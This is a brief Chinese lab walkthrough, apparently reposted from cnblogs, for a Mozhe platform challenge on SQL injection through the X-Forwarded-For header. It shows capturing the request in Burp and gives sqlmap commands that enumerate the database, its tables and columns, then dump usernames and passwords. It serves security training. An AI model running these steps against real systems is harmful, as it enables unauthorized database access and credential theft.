X-forwarded-for注入漏洞实战

1、掌握SQL注入的基本原理；
2、了解服务器获取客户端IP的方式；
3、了解SQL注入的工具使用；

随便输入用户名密码登录，提示有ip信息，根据题目的意思是信息是根据x-forwarded-for的纸变得，所以本题存在x-forwarded-for注入
1.首先打开burp抓包，添加x-forwarded-for:*，将raw的信息存为txt文件，如下图所示，速度比较慢，请耐心等待

2：#sqlmap -r 1.txt --current-db --batch    //爆出数据库
3：#sqlmap -r 1.txt -D webcalendar --tables  //爆出表
4：#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列
5：#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码


这是墨者平台的一道注入题

X-forwarded-for注入漏洞实战

原文：https://www.cnblogs.com/gusi/p/11711456.html